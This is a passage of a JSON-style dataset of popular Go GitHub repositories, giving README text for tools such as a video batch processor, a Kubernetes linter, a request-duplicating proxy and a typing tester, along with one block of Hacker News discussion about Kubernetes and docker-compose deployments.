"https://github.com/suifengqjn/videoWater", "tags": ["video", "watermarking", "watermark-image", "watermark-remover", "watermark", "video-cliper"], "stars": 508, "description": "\u89c6\u9891\u6279\u91cf\u5904\u7406, \u7801\u7387\u8bbe\u7f6e, \u683c\u5f0f\u8f6c\u6362, \u6dfb\u52a0\u5b57\u5e55, \u6dfb\u52a0\u6c34\u5370, \u6587\u5b57\u8dd1\u9a6c\u706f, \u53bb\u9664\u6c34\u5370, \u4fee\u6539\u5206\u8fa8\u7387, \u89c6\u9891\u526a\u88c1, \u500d\u901f\u64ad\u653e, \u89c6\u9891\u5206\u6bb5, \u89c6\u9891\u5408\u6210, \u89c6\u9891\u955c\u50cf, \u80cc\u666f\u97f3\u4e50, \u63d2\u5165\u80cc\u666f\u56fe\u7247, \u89c6\u9891\u9ad8\u65af\u6a21\u7cca, \u6a21\u7cca\u62d3\u8fb9, \u753b\u4e2d\u753b,\u5b57\u5e55,\u7ffb\u8bd1,\u5f71\u89c6\u89e3\u8bf4,\u5f71\u89c6\u6df7\u526a,\u6296\u97f3\u5e26\u8d27,\u89c6\u9891\u5168\u81ea\u52a8\u526a\u8f91,\u89c6\u9891\u6279\u91cf\u526a\u8f91", "lang": "Go", "repo_lang": "", "readme": "### Video Demo\n\nThe video introduces how to configure the parameters of each function, and how to use the software as a whole\n\n[1. Download, install, use and simple demo (must see)](https://www.bilibili.com/video/av84085197/)\n\n[2. Video format conversion](https://www.bilibili.com/video/av84090158/)\n\n[3. Change video frame rate and bit rate](https://www.bilibili.com/video/av84090567/)\n\n[4. Remove video title and trailer](https://www.bilibili.com/video/av84090675/)\n\n[5. Video trimming](https://www.bilibili.com/video/av84090816/)\n\n[6. Remove watermark from video](https://www.bilibili.com/video/av84093352/)\n\n[7. Video Mirror Production](https://www.bilibili.com/video/av84093482/)\n\n[8. Modify video resolution](https://www.bilibili.com/video/av84093628/)\n\n[9. Video compression](https://www.bilibili.com/video/av84093725/)\n\n[10. Text watermark and image watermark](https://www.bilibili.com/video/av84093826/)\n\n[11. Double speed playback](https://www.bilibili.com/video/av84093943/)\n\n[12. Add title and trailer](https://www.bilibili.com/video/av84094016/)\n\n[13. Pseudo-original parameter configuration recommendation](https://www.bilibili.com/video/av84094116/)\n\n[14. Batch watermark removal by cutting method](https://www.bilibili.com/video/av86108022)\n\n[15. Add scrolling text watermark]()\n\n[16. Add random background music]()\n\n[17. Stroke text](https://www.bilibili.com/video/BV1hk4y167sZ/)\n\n[20. Independent function: video segmentation](https://www.bilibili.com/video/av84094229/)\n\n\n\n### windows system use\n\nThis is the structure after software decompression\n\n![](https://github.com/suifengqjn/videoWater/blob/master/image/r_1.png?raw=true)\n\n* config.toml needs to configure the video operation\n* source software depends on tools, do not touch\n* video The videos that need to be processed are placed in this folder\n* vm.exe launcher\n\nThere is a switch for each operation in config.toml, which operation is not needed, just close it\n\nOperation example:\n\n![](https://github.com/suifengqjn/videoWater/blob/master/image/r_2.png?raw=true)\n\nScale now puts a video in the video directory, and the config.toml is also configured\nDouble-click vm.exe directly to open the program.\n\n![](https://github.com/suifengqjn/videoWater/blob/master/image/r_3.png?raw=true)\n\nAfter running, there will be a result folder under the video, and the processed video is in it\n\n\n### mac system use\n\nThe opening method of mac is different\n\nUse the terminal to enter the folder where the program is located\n\n![](https://github.com/suifengqjn/videoWater/blob/master/image/r_4.png?raw=true)\n\nrun the program\n`./vm`\n\nIf permission denied appears\nThen execute `chmod 777 vm`\n\nExecute `./vm` again", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "digitalocean/clusterlint", "link": "https://github.com/digitalocean/clusterlint", "tags": ["kubernetes", "linter", "best-practices", "hacktoberfest"], "stars": 507, "description": "A best practices checker for Kubernetes clusters. \ud83e\udd20", "lang": "Go", "repo_lang": "", "readme": "# Clusterlint\n\n[![CircleCI](https://circleci.com/gh/digitalocean/clusterlint.svg?style=svg)](https://circleci.com/gh/digitalocean/clusterlint)\n\nAs clusters scale and become increasingly difficult to maintain, clusterlint helps operators conform to Kubernetes best practices around resources, security and reliability to avoid common problems while operating or upgrading the clusters.\n\nClusterlint queries live Kubernetes clusters for resources, executes common and platform specific checks against these resources and provides actionable feedback to cluster operators. It is a non invasive tool that is run externally. Clusterlint does not alter the resource configurations.\n\n### Background\n\nKubernetes resources can be configured and applied in many ways. This flexibility often makes it difficult to identify problems across the cluster at the time of configuration. Clusterlint looks at live clusters to analyze all its resources and report problems, if any.\n\nThere are some common best practices to follow while applying configurations to a cluster like:\n\n- Namespace is used to limit the scope of the Kubernetes resources created by multiple sets of users within a team. Even though there is a default namespace, dumping all the created resources into one namespace is not recommended. It can lead to privilege escalation, resource name collisions, latency in operations as resources scale up and mismanagement of kubernetes objects. Having namespaces ensures that resource quotas can be enabled to keep track node, cpu and memory usage for individual teams.\n\n- Always specify resource requests and limits on pods: When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on. And when containers have their limits specified, contention for resources on a node can be handled in a specified manner.\n\nWhile there are problems that are common to clusters irrespective of the environment they are running in, the fact that different Kubernetes configurations (VMs, managed solutions, etc.) have different subtleties affect how workloads run. Clusterlint provides platform specific checks to identify issues with resources that cluster operators can fix to run in a specific environment.\n\nSome examples of such checks are:\n\n- On upgrade of a cluster on [DOKS](https://www.digitalocean.com/products/kubernetes/), the worker nodes' hostname changes. So, if a user's pod spec relies on the hostname to schedule pods on specific nodes, pod scheduling will fail after upgrade.\n\n*Please refer to [checks.md](https://github.com/digitalocean/clusterlint/blob/master/checks.md) to get some background on every check that clusterlint performs.*\n\n### Install\n\n```bash\ngo get github.com/digitalocean/clusterlint/cmd/clusterlint\n```\n\nThe above command creates the `clusterlint` binary in `$GOPATH/bin`\n\n### Usage\n\n```bash\nclusterlint list [options] // list all checks available\nclusterlint run [options] // run all or specific checks\n```\n\n### Running in-cluster\n\nBuild the docker image to run clusterlint from within a cluster by doing:\n\n```shell\ndocker build -t /clusterlint: .\ndocker push /clusterlint:\n```\n\nIf you're running clusterlint from within a Pod, you can use the `--in-cluster` flag to access the Kubernetes API from the Pod.\n\n```\nclusterlint --in-cluster run\n```\n\nHere's a simple example of CronJob definition to run clusterlint in the default namespace without RBAC : \n\n```yaml\napiVersion: batch/v1\nkind: CronJob\nmetadata:\n name: clusterlint-cron\nspec:\n schedule: \"0 */1 * * *\"\n concurrencyPolicy: Replace\n failedJobsHistoryLimit: 3\n successfulJobsHistoryLimit: 1\n jobTemplate:\n spec:\n template:\n spec:\n containers:\n - name: clusterlint\n image: docker.io//clusterlint:\n command: ['/clusterlint', '--in-cluster', 'run']\n imagePullPolicy: IfNotPresent\n restartPolicy: Never\n```\n\nIf you're using RBAC, see [docs/RBAC.md](docs/RBAC.md).\n\n### Specific checks and groups\n\nAll checks that clusterlint performs are categorized into groups. A check can belong to multiple groups. This framework allows one to only run specific checks on a cluster. For instance, if a cluster is running on DOKS, then, running checks specific to AWS does not make sense. Clusterlint can blacklist aws related checks, if any while running against a DOKS cluster.\n\n```bash\nclusterlint run -g basic // runs only checks that are part of the basic group\nclusterlint run -G security // runs all checks that are not part of the security group\nclusterlint run -c default-namespace // runs only the default-namespace check\nclusterlint run -C default-namespace // exclude default-namespace check\n```\n\n### Disabling checks via Annotations\n\nClusterlint provides a way to ignore some special objects in the cluster from being checked. For example, resources in the kube-system namespace often use privileged containers. This can create a lot of noise in the output when a cluster operator is looking for feedback to improve the cluster configurations. In order to avoid such a situation where objects that are exempt from being checked, the annotation `clusterlint.digitalocean.com/disabled-checks` can be added in the resource configuration. The annotation takes in a comma separated list of check names that should be excluded while running clusterlint.\n\n```json\n\"metadata\": {\n \"annotations\": {\n \"clusterlint.digitalocean.com/disabled-checks\" : \"noop,bare-pods\"\n }\n}\n```\n\n### Building local checks\n\nSome individuals and organizations have Kubernetes best practices that are not\napplicable to the general community, but which they would like to check with\nclusterlint. If your check may be useful for *anyone* else, we encourage you to\nsubmit it to clusterlint rather than keeping it local. However, if you have a\ntruly specific check that is not appropriate for sharing with the broader\ncommunity, you can implement it using Go plugins.\n\nSee the [example plugin](example-plugin) for documentation on how to build a\nplugin. Please be sure to read the [caveats](example-plugin/README.md#caveats)\nand consider whether you really want to maintain a plugin.\n\nTo use your plugin with clusterlint, pass its path on the commandline:\n\n```console\n$ clusterlint --plugins=/path/to/plugin.so list\n$ clusterlint --plugins=/path/to/plugin.so run -c my-plugin-check\n```\n\n## Release\n\nTo release a new version of clusterlint, go to the actions page on GitHub, click on `Run workflow`.\nSpecify the new tag to create. Make sure the tag is prefixed with `v`.\n\nThe workflow does the following:\n\n- Checks out the source code from the default branch\n- Login with dockerhub credentials specified as secrets\n- Builds the docker image digitalocean/clusterlint:\n- Pushes digitalocean/clusterlint: to dockerhub\n- Builds binaries for all archs and computes sha256 sums for each binary\n- Creates release and tags the latest commit on the default branch with the input tag specified when workflow is triggered\n\n## Contributing\n\nContributions are welcome, in the form of either issues or pull requests. Please\nsee the [contribution guidelines](CONTRIBUTING.md) for details.\n\n## License\n\nCopyright 2022 DigitalOcean\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at:\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "chrislusf/teeproxy", "link": "https://github.com/chrislusf/teeproxy", "tags": [], "stars": 507, "description": null, "lang": "Go", "repo_lang": "", "readme": "teeproxy\n=========\n\n[![Docker Pulls](https://img.shields.io/docker/pulls/chrislusf/teeproxy.svg?maxAge=604800)](https://hub.docker.com/r/chrislusf/teeproxy/)\n\nA reverse HTTP proxy that duplicates requests.\n\nWhy you may need this?\n----------------------\n\nYou may have production servers running, but you need to upgrade to a new system. You want to run A/B test on both old and new systems to confirm the new system can handle the production load, and want to see whether the new system can run in shadow mode continuously without any issue.\n\nHow it works?\n-------------\n\nteeproxy is a reverse HTTP proxy. For each incoming request, it clones the request into 2 requests, forwards them to 2 servers. The results from server A are returned as usual, but the results from server B are ignored.\n\nteeproxy handles GET, POST, and all other http methods.\n\nBuild\n-------------\n\n```\ngo build\n```\n\nUsage\n-------------\n\n```\n ./teeproxy -l :8888 -a [http(s)://]localhost:9000 -b [http(s)://]localhost:9001 [-b [http(s)://]localhost:9002]\n```\n\n`-l` specifies the listening port. `-a` and `-b` are meant for system A and systems B. The B systems can be taken down or started up without causing any issue to the teeproxy.\n\n#### Configuring timeouts ####\n \nIt's also possible to configure the timeout to both systems\n\n* `-a.timeout int`: timeout in milliseconds for production traffic (default `2500`)\n* `-b.timeout int`: timeout in milliseconds for alternate site traffic (default `1000`)\n\n#### Configuring host header rewrite ####\n\nOptionally rewrite host value in the http request header.\n\n* `-a.rewrite bool`: rewrite for production traffic (default `false`)\n* `-b.rewrite bool`: rewrite for alternate site traffic (default `false`)\n \n#### Configuring a percentage of requests to alternate site ####\n\n* `-p float64`: only send a percentage of requests. The value is float64 for more precise control. (default `100.0`)\n\n#### Configuring HTTPS ####\n\n* `-key.file string`: a TLS private key file. (default `\"\"`)\n* `-cert.file string`: a TLS certificate file. (default `\"\"`)\n\n#### Configuring client IP forwarding ####\n\nIt's possible to write `X-Forwarded-For` and `Forwarded` header (RFC 7239) so\nthat the production and alternate backends know about the clients:\n\n* `-forward-client-ip` (default is false)\n\n#### Configuring connection handling ####\n\nBy default, teeproxy tries to reuse connections. This can be turned off, if the\nendpoints do not support this.\n\n* `-close-connections` (default is false)\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bloznelis/typioca", "link": "https://github.com/bloznelis/typioca", "tags": ["cli", "terminal", "tui", "typing", "golang", "typingtest"], "stars": 507, "description": "Cozy typing speed tester", "lang": "Go", "repo_lang": "", "readme": "

typioca

\n\n

Minimal, terminal based typing speed tester.

\n

\"GitHub \"GitHub

\n\n> **Tapioca** (/\u02cct\u00e6pi\u02c8o\u028ak\u0259/) is a starch extracted from the storage roots of the cassava plant. Pearl tapioca is a common ingredient in Asian desserts...and sweet drinks such as **bubble tea**.\n\n![](https://github.com/bloznelis/typioca/blob/master/img/typioca.gif)\n\n## Features\n * Time or word/sentence count based typing speed tests\n * Proper WPM results based on https://www.speedtypingonline.com/typing-equations\n * Multiple word/sentence lists made out of classical books to spice your test up\n * Cursor aware word lines\n * Interactive menu\n * ctrl+w support\n * SSH server `typioca serve`\n * Dynamic word lists\n * Custom word lists\n * Linux/Mac/Win support\n\n## Installation\n\n### AUR\n\n```\nyay -S typioca-git\n```\n\n### Go\n\n```\ngo install github.com/bloznelis/typioca@latest\n```\n\n**Note:** This will install typioca in `$GOBIN`, which defaults to `$GOPATH/bin` or `$HOME/go/bin` if the GOPATH environment variable is not set.\n\n### Homebrew\n\n```\nbrew tap bloznelis/tap\nbrew install typioca\n```\n\n### Scoop\n\n```\nscoop bucket add extras\nscoop install typioca\n```\n\n### Void Linux\n\n```\nxbps-install typioca\n```\n\n### Winget\n\n```\nwinget install bloznelis.typioca\n```\n\n### Building from source\n 1. Checkout the code\n 2. `make build`\n 3. `./execs/typioca`\n\n#### Prerequisites\n * `make`\n * `go`\n\n## Custom wordlists\n1. Create your word list in the same JSON format as the official ones [example](https://raw.githubusercontent.com/bloznelis/typioca/master/words/storage/words/common-english.json).\n - **Note:** for new-line separated word lists (like [this one](https://raw.githubusercontent.com/powerlanguage/word-lists/master/1000-most-common-words.txt)), for your convenience, you can use [this Clojure script](https://github.com/bloznelis/typioca/blob/master/words/common-word-list.clj). Explanation how to use it can be found [here](https://github.com/bloznelis/typioca/tree/master/words).\n3. Place your configuration to platform specific location:\n\n| Platform | **User configuration** |\n|----------|--------------------------------------------------------------------------------------------|\n| Windows | `%APPDATA%\\typioca\\typioca.conf` or `C:\\Users\\%USER%\\AppData\\Roaming\\typioca\\typioca.conf` |\n| Linux | `$XDG_CONFIG_HOME/typioca/typioca.conf` or `$HOME/.config/typioca/typioca.conf` |\n| macOS | `$HOME/Library/Application Support/typioca/typioca.conf` |\n\nConfig example (it is [TOML](https://github.com/toml-lang/toml)):\n```toml\n[[words]]\n name = \"Best hits '22\"\n enabled = false\n sentences = false\n path = \"/home/words/best-hits-22.json\"\n[[words]]\n name = \"Even better hits '23\"\n enabled = true\n sentences = false\n path = \"/home/words/better-hits-23.json\"\n```\n3. Use your words!\n![ship it](https://user-images.githubusercontent.com/33397865/176735281-5c2b34cb-5b19-43c1-9954-92c0583c4cc5.png)\n\n**Note:** Notice that custom wordlist controls are greyed-out, personal configuration must be handled via the file only.\n\n---\n![1](https://user-images.githubusercontent.com/33397865/176732388-11b66a1e-1d20-420f-a583-5d95241444d6.png)\n![3](https://user-images.githubusercontent.com/33397865/176732403-9c64e277-f533-4bf3-96a5-a26303b37b60.png)\n![2](https://user-images.githubusercontent.com/33397865/176732395-73c6c922-6a0d-4576-90bb-1f77e2c9b065.png)\n![4](https://user-images.githubusercontent.com/33397865/176732415-aac89b54-15d3-4b10-8408-fac997b97085.png)\n\n### Acknowledgments\nBuilt with [bubbletea](https://github.com/charmbracelet/bubbletea)\n\n\ud83e\uddcb\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes/api", "link": "https://github.com/kubernetes/api", "tags": ["k8s-staging"], "stars": 506, "description": "The canonical location of the Kubernetes API definition.", "lang": "Go", "repo_lang": "", "readme": "# api\n\nSchema of the external API types that are served by the Kubernetes API server.\n\n## Purpose\n\nThis library is the canonical location of the Kubernetes API definition. Most likely interaction with this repository is as a dependency of client-go.\n\nIt is published separately to avoid diamond dependency problems for users who\ndepend on more than one of `k8s.io/client-go`, `k8s.io/apimachinery`,\n`k8s.io/apiserver`...\n\n## Recommended Use\n\nWe recommend using the go types in this repo. You may serialize them directly to\nJSON.\n\nIf you want to store or interact with proto-formatted Kubernetes API objects, we\nrecommend using the \"official\" serialization stack in `k8s.io/apimachinery`.\nDirectly serializing these types to proto will not result in data that matches\nthe wire format or is compatible with other kubernetes ecosystem tools. The\nreason is that the wire format includes a magic prefix and an envelope proto.\nPlease see:\nhttps://kubernetes.io/docs/reference/using-api/api-concepts/#protobuf-encoding\n\nFor the same reason, we do not recommend embedding these proto objects within\nyour own proto definitions. It is better to store Kubernetes objects as byte\narrays, in the wire format, which is self-describing. This permits you to use\neither JSON or binary (proto) wire formats without code changes. It will be\ndifficult for you to operate on both Custom Resources and built-in types\notherwise.\n\n## Compatibility\n\nBranches track Kubernetes branches and are compatible with that repo.\n\n## Where does it come from?\n\n`api` is synced from https://github.com/kubernetes/kubernetes/blob/master/staging/src/k8s.io/api. Code changes are made in that location, merged into `k8s.io/kubernetes` and later synced here.\n\n## Things you should *NOT* do\n\n1. https://github.com/kubernetes/kubernetes/blob/master/staging/src/k8s.io/api is synced to k8s.io/api. All changes must be made in the former. The latter is read-only.\n\n\n", "readme_type": "markdown", "hn_comments": "Amazon publishing a blog that blatantly argues for vendor lock-in? Who would have guessed?One of the big benefits of Kubernetes is the cloud-agnostic API for running pretty much any application. CustomResources can help blur that boundary and make it easier to use some managed services, but actually arguing in favor of that approach for everything is a pure advertising tactic.It's no secret that managed services are several times more expensive than equivalent EC2 time. Sometimes it's worth it. But to throw Kubernetes into the mix just to run some controllers that deploy those services will pointlessly add to your monthly bill. Running any Kubernetes cluster is not cheap, even if it's just a bunch of controllers.There has been a lot of prior work in this space. There's crossplane, the Terraform Operator, and a ton of roll-your-own solutions for tackling this vary problem. Alibaba also was early to have the concept of a 'virtual node' where you can deploy seemingly infinite number of pods, they'll handle all the orchestration below.I was reading the article thinking \"Yes, finally, some code or use to implement interacting with AWS without a 3rd party lib\" and then I got to this section at the bottom:> In this post, we showed you the flexibility of Kubernetes. It\u2019s arguably an extreme option and one that doesn\u2019t even exist today (the Amazon ECS ACK controller isn\u2019t available but please thumb up this roadmap proposal if you are intrigued). If anything, it proves that Kubernetes can be a lot of things to a lot of different people and defining it remains a work in progress (at least in my head).As usual, Amazon is playing catch-up in actually orchestrating their services in a non-AWS-centric way. Very deceptive to create a blog post and not disclose it's not real software at the end.The last one (Kubernetes is my control plane but not my data plane) is completely stupid. Instead of that why not use terraform or equivalents ?Paying for EKS just to use its API to provision and manage other AWS resources is an interesting idea, but not something I'd use in production.> What is kubernetes?For me it's a platform to deploy apps without tying myself into a particular vendor.I love how conveniently on-premise kubernetes is missing. Or self-managed in the cloud.The whole point of kubernetes is to not think about your servers anymore because they in essence can be replaced at any time. This would only provide absolute vendor lock-in.Of course you can use any external service there is (like a database) but you should never put all your eggs into one basked and trust only one hoster. The principle remains the same: its just someone elses computer.Storage and networking are solved in a lot of places at a fraction of the cost and that is really just the beginning., but also the whole point of the exercise: to be able to move your workloads from wherever to wherever> Like in the past, when we used to store logic inside databases, using triggers and stored procedures. And now we know this kind of architecture can lead to problems related to performance, scale, and vendor lock-in.Many people use these database features quite well & suffer no problems. Doing things has risk. We have to keep interpetting _ deciding what risks, pro's/con's there are.It's a long read/rant, but I recommend Steve Yegge's Notes from the Mystery Machine Bus, where he talks about the political alignment of engineers into conservative or progressive positions. He's not totally right about his own opinions- turns out static typing has a lot of upsides, or at least, we havent made an IDE that can give us autocomplete as good without it- but the framing, the way of considering how we accept or reject ideas around us is capital.I see a lot of fear in this post. And it seems like an interesting premise. But I'd need a lot more to go on to start seeing the problem. Autonomic systems have a big risk of going wrong & there being no one in the room who understands, who can dive in & see the operator work: that to me is the chief risk; the de-skilling they enable. Maybe in some ways that mirrors problems stored procedures had. But operators are also capable of having really good observability, of really saying what they're doing and why, and that is the perfect counter, is bringing the light of understanding to the darker systems. Where-as the database has rarely been a good debuggable rich-context world.Woah, alright! This is what I've been waiting for. Thanks for building this... I can't wait to test it out!> Using container orchestration tools like Kubernetes or Nomad is usually an overkill for projects that will do fine with a single-server Docker Compose setup.Couldn't agree more! Very nice!Docker compose is great, I use it a lot for local development and testing of distributed systems. With a few tweaks you can simulate almost anything in containers including systemd and low-level networking stuff, which e.g. makes simulating an entire Ansible based setup trivial.Too bad Docker doesn't seem to push this much, with a bit of extra work this probably could be the deployment platform for 95 % of all software systems.Awesome! I might use this.I think this approach should work fine with https://github.com/lucaslorentz/caddy-docker-proxy as well.Is a single node k3s overkill? I don't think so. Once you outgrow it, you can port your deployments to a real k8s cluster.I just did a quick search for how to achieve a basic no-downtime deploy with Podman. It turns out it is not that hard [0]. Not sure how to do this if pods or containers are managed as systemd services, though.[0] https://github.com/evolutics/zero-downtime-deployments-with-...Dokku Maintainer here.This is pretty neat. One of my gripes about docker-compose - and a major why I've been hesitant to add support for it - is that the updates are not zero-downtime. That makes it much more annoying to use for app deploys as you either have to rewrite the compose command as a docker command (defeating part of the purpose of a compose file) or accept the downtime during a deploy. I'll definitely be including this tool (or something like it) with Dokku once I actually add compose support.Combining this with either Caddy Docker Proxy[1] or Traefik[2] could be quite nice for a very simple app deployment system.Would be super awesome for this functionality to land in the official `compose` plugin, but for now this is a great way to dip your toes into app deployments without too much overhead.There is a small island of productivity tools around docker-compose that would be super nice to build, and it's nice to see something like this land :) - https://github.com/lucaslorentz/caddy-docker-proxy\n - https://doc.traefik.io/traefik/providers/docker/This is great to see - fills the biggest hole in Docker Compose.I built something similar, it was a bit fragile though. What I ended up using instead was a lot simpler with only a little downside: Caddy for a reverse proxy will buffer requests when the downstream is down, unlike Nginx (which we used before). So during a deploy nobody gets any errors, just a brief 2s delay while the new service boots up. Seamless enough for me.If you are only running on a single node, it doesn't sound like downtime is a big concern regardless?UrghInterestingly, it looks like DHH is working on something similar (for Rails): https://github.com/mrsked/mrsk> MRSK deploys web apps in containers to servers running Docker with zero downtime. It uses the dynamic reverse-proxy Traefik to hold requests while the new application container is started and the old one is stopped. It works seamlessly across multiple hosts, using SSHKit to execute commands.thanks , have been looking a simple solution for thisDocker has some serious flaws with respect to app health and doing something about it when it's unhealthy.Just look at this PR that is 3years old and counting:\nhttps://github.com/moby/moby/issues/28400>> as it's not possible to run multiple containers with the same name or port mapping.I think you can :)What's wrong with Docker swarm mode? It already supports stacks and blue/green deployments.Doesn't this represent reinventing the wheel?FWIW I have discovered a simple technique that solves this problem without any additional software: I create two or more services that are identical in all but name, so instead of a `backend` service I'll have `backend1`, `backend2` etc.When I need to restart the service, I do it in a staggered fashion, first stop and restart `backend1`, wait a few seconds, then stop and restart `backend2` etc. I put this in a script, works without any problem.so a blue-green deployment for docker-compose, neatAFAIK nginx-proxy does not enable true zero-downtime. Thus using this tool with nginx-proxy does not enable zero-downtime.Example.Deployment goes like this:1) 2 app versions are deployed - blue (vCurrent) and green (vNext); both are up and ready to handle connections2) We are about to shut down blue and replace it with green3) Blue is handling long-running http request; receives shutdown signal; keeps handling long-running request, but does not accept new connections from now on4) because it is still active (nginx-proxy wont remove it), blue will still receive connections from nginx-proxy, and all of them will fail because of reasons stated in (3)\nConnections routed to green will succeed;\nThis is where zero-downtime fails.5) Once long running request is handled, and blue removed from docker, only then nginx-proxy refreshes its configuration and routes all traffic to green.If i am correct, this tool solves issue where non-working container are configured to receive traffic by nginx-proxy, but does not solve issue where partially shutdown old container still receices traffic and drops it.I dont know about caddy-docker-proxy.Isn't that functionality already buried somewhere between Docker Stack and Docker Swarm?Awesome, I was looking for something just like this the other day. I\u2019ll be checking this out!I did something similar using git hooks (for Heroku-like deployments) and curl for health-checking the app [0]. In my case, instead of using replicas, I created multiple services in the docker-compose.yaml file. The services are the same but with different names (e.g: app1 and app2). Then, during deployment I can update only app1, run the health checks, then update app2 if everything is ok.[0]: https://ricardoanderegg.com/posts/git-push-deployments-docke...[dead]https://dockerswarm.rocks/Bunnyshell.com has a remote development feature that works like this:\n- environments are deployed to you Kubernetes cluster (via bunnyshell) \n- developers edit files locally (on their laptops) in any IDE/editor they wish\n- code is synced in real-time to the cloud envSo devs write code locally, but it runs remotely, in the cloud, in a complete environments.Also, ephemeral environments are available ( create/destroy env on PR open/close).Disclosure: I work @BunnyshellI have been managing team servers for a while, in most of the cases, a server was required to:1. Running experiments, like trying tools before committing to integrating them in our project.2. Run a tool that would simplify local development setup, in most cases, running a backend or a database.3. Try a preview from our applications in a cloud environment.For the 1st case a single shared server for experiments has worked fine, I guess this would depend on each team.For the 2nd case, we'd usually create a server specific for the tool and share the access with devs requiring it.For the 3rd case, it got a bit more complicated because there are times where many devs what to push a preview, requiring coordination between devs which is tedious and error-prone. At the end, we took your route and we ended up building our own service to provide fullstack preview environments automatically when pushing code to our repository, so far, it has removed the need to share servers with devs for most scenarios.Can't you use NixOS for this stuff? I think it's the main selling point of NixOS that every developer has the same environment. You may also deploy those nix environments via terraform.Before tooling even comes into the equation, you owe it to yourself and your sanity to read this in full: http://blog.lusis.org/blog/2016/05/15/so-you-wanna-go-onprem...Here be dragons.At some smaller companies I have worked at we used Terraform and Helm for everything. We had a strict policy that anything beyond dev had to be deployed by a robot owned by our security operations team. We already had multiple test and staging environments so that developers can remain unblocked. When an enterprise customer required a dedicated instance we created an additional set of environments from our existing templates.The environments looked like:\n - platformcodename-$customerid-test0\n - platformcodename-$customerid-test1\n - platformcodename-$customerid-stage0\n - platformcodename-$customerid-prodand so on. At one of these places we were doing multi-cloud so each of these environments were a GCP Project and AWS subaccount. At another where we were on bare-metal put single-tenant customers in their own Kubernetes namespace (we were strong on genuine multi-tenancy), then we had a very special customer that we put on a dedicated Kubernetes cluster accompanied by a dedicated storage cluster.If you have robust DevOps this should be an easy problem to solve. I have to admit upfront I am probably biased to what \"robust DevOps\" means because of how many people I have recently encountered with \"DevOps\" in their title who shy away from stuff DevOps has been traditionally expected to do. Maybe I should think up a different role description for myself.This is a scary slope. A single client having their own environment 10 years ago was worth about 9% of sales so they need to be paying 10* what your next highest customer pays.Now if you are in AWS you can just invoice them the cost of their own subscription + 100% which makes it easier and they may pay.This is an interesting problem. I think a massive part of this is how much customers are paying. If it's enough, certain parts that may be hard to automate can be done manually.IaaC and good software packaging will help take care of your infra, but working with 3rd party managed services that may live outside of your cloud provider will vary. If the customers are paying a lot, it becomes worth the time to manually do those steps (after verifying that they can't be automated).Let's pretend you can automate with IaaC and docker images (although any deployment style works). You can wrap that entire process into a script that will initialize and all perform tests against the infra/service.I'm not too familiar with it outside of exam prep, but AWS (and probably the other big guys) offer the idea of an organization, which consists of multiple accounts. Makes for easier tracking, with strong isolation. Could be a route to go.There's a lot of variables here, and as others have said, it's a tricky path. I also think it's an interesting problem and I hope you have fun solving it.This would have to be a potential new line of business to be worth it unless the customer is willing to pay the cost to build and maintain plus a significant markup.We did something similar for a major healthcare client but our pricing scaled with volume and they paid for all our development costs + markup.Luckily we already had said no to a few smaller clients so when the solution was built we sold it to them as well.May I ask what backend platform / language are you using? I ask this because I've been developing something which is due to be released within Q1 of this year, and would like to understand my target market.Currently my solution works for Elixir / Phoenix and static pages. But I'm working on expanding to ruby / rails and nodeJS based frameworks.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "recode-sh/cli", "link": "https://github.com/recode-sh/cli", "tags": ["recode", "aws", "cli", "golang"], "stars": 506, "description": "A CLI to create remote development environments in your cloud provider account in seconds", "lang": "Go", "repo_lang": "", "readme": "

\n \"recode\"\n

\n\n

\n

Recode

\n

Remote development environments defined as code. Running in your cloud provider account.
Currently available on Amazon Web Services and Visual Studio Code.

\n

\n\n
\n ... you can think of it as a desktop version of Gitpod / Coder / GitHub Codespaces less polished and with less features but 100% free, 100% open-source and 100% community-driven\n
\n\n```bash\nrecode aws start recode-sh/workspace --instance-type t2.medium\n```\n\nhttps://user-images.githubusercontent.com/1233275/172346442-d6fef09c-2ef0-4633-8d72-e20bef8fc1a9.mp4\n\n\"vscode\"\n\n
\n ... see the recode-sh/workspace repository for an example of development environment configuration\n
\n\n## Table of contents\n- [Requirements](#requirements)\n- [Installation](#installation)\n- [Usage](#usage)\n - [Login](#login)\n - [Start](#start)\n - [Stop](#stop)\n - [Remove](#remove)\n - [Uninstall](#uninstall)\n- [Development environments configuration](#development-environments-configuration)\n - [Tip: the --rebuild flag](#-tip-the---rebuild-flag)\n - [Tip: Docker & Docker compose](#-tip-docker--docker-compose)\n - [User configuration](#user-configuration)\n - [Project configuration](#project-configuration)\n - [What if I don't have an user configuration?](#-what-if-i-dont-have-an-user-configuration)\n - [Recode configuration](#recode-configuration)\n - [Base image (recode-sh/base-dev-env)](#base-image-recode-shbase-dev-env)\n - [Visual Studio Code extensions](#visual-studio-code-extensions)\n - [Multiple repositories](#multiple-repositories)\n - [Build arguments (RECODE_INSTANCE_OS and RECODE_INSTANCE_ARCH)](#build-arguments-recode_instance_os-and-recode_instance_arch)\n - [Hooks](#hooks)\n- [Frequently asked questions](#frequently-asked-questions)\n - [How does it compare with GitPod / Coder / Codespaces / X?](#-how-does-it-compare-with-gitpod--coder--codespaces--x)\n - [How does it compare with Vagrant / VSCode remote SSH / Container extensions?](#-how-does-it-compare-with-vagrant--vscode-remote-ssh--container-extensions)\n - [Why using Docker as a VM and not something like NixOS, for example?](#-why-using-docker-as-a-vm-and-not-something-like-nixos-for-example)\n - [Given that my dev env will run in a container does it mean that it will be limited?](#-given-that-my-dev-env-will-run-in-a-container-does-it-mean-that-it-will-be-limited)\n- [The future](#the-future)\n- [License](#license)\n\n## Requirements\n\nThe Recode binary has been tested on Linux and Mac. Support for Windows is theoretical ([testers 